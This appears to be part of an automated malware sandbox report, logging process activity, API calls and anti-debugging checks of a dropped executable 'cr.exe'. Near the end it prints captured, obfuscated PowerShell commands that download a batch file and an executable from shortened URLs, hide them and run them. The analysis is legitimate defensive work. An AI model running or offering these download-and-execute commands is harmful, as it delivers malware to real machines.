      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2960Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3044Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_0043DCD2
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0045F42D FindFirstFileExW,24_2_0045F42D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_0043DCF2
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,24_2_0043DE3D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,24_2_002AE08D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CF67D FindFirstFileExW,24_2_002CF67D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_002ADF22
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_002ADF42
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA,24_2_00434AFC
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004365E1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,24_2_004365E1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: powershell.exe, 0000000E.00000002.2143327246.000000000035B000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00446061
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,24_2_00423778
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044663D mov eax, dword ptr fs:[00000030h]24_2_0044663D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459A7D mov eax, dword ptr fs:[00000030h]24_2_00459A7D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459A39 mov eax, dword ptr fs:[00000030h]24_2_00459A39
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00459AAE mov eax, dword ptr fs:[00000030h]24_2_00459AAE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00220083 push dword ptr fs:[00000030h]24_2_00220083
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B688D mov eax, dword ptr fs:[00000030h]24_2_002B688D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027092B mov eax, dword ptr fs:[00000030h]24_2_0027092B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002C9C89 mov eax, dword ptr fs:[00000030h]24_2_002C9C89
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002C9CFE mov eax, dword ptr fs:[00000030h]24_2_002C9CFE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002C9CCD mov eax, dword ptr fs:[00000030h]24_2_002C9CCD
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00270D90 mov eax, dword ptr fs:[00000030h]24_2_00270D90
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00409290 __EH_prolog,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,24_2_00409290
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FFB9 SetUnhandledExceptionFilter,24_2_0043FFB9
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00446061
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0044017B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_0044017B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FE57 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_0043FE57
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B00A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_002B00A7
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B62B1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_002B62B1
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B03CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_002B03CB
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.batJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe' Jump to behavior

      Language, Device and Operating System Detection:

      barindex
      Yara detected Obfuscated PowershellShow sources
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\Documents\pd.bat, type: DROPPED
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FC7B cpuid 24_2_0043FC7B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,GetUserNameA,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,WaitForSingleObject,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,24_2_00425760
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,24_2_0046207E
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,24_2_00462033
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,24_2_00462119
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,24_2_004621A4
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,24_2_004623F7
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,24_2_0046251D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,24_2_004365E1
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,24_2_00458604
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,24_2_00462623
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,24_2_004626F2
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,24_2_00461D91
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,24_2_00457FD7
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,24_2_00461F8C
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,24_2_002C8227
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,24_2_002D2283
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,24_2_002D22CE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,24_2_002D2369
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,24_2_002D23F4
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,24_2_002D2647
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,24_2_002D276D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,24_2_002D2873
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,24_2_002C8854
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,24_2_002D2942
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,24_2_002D1FE1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
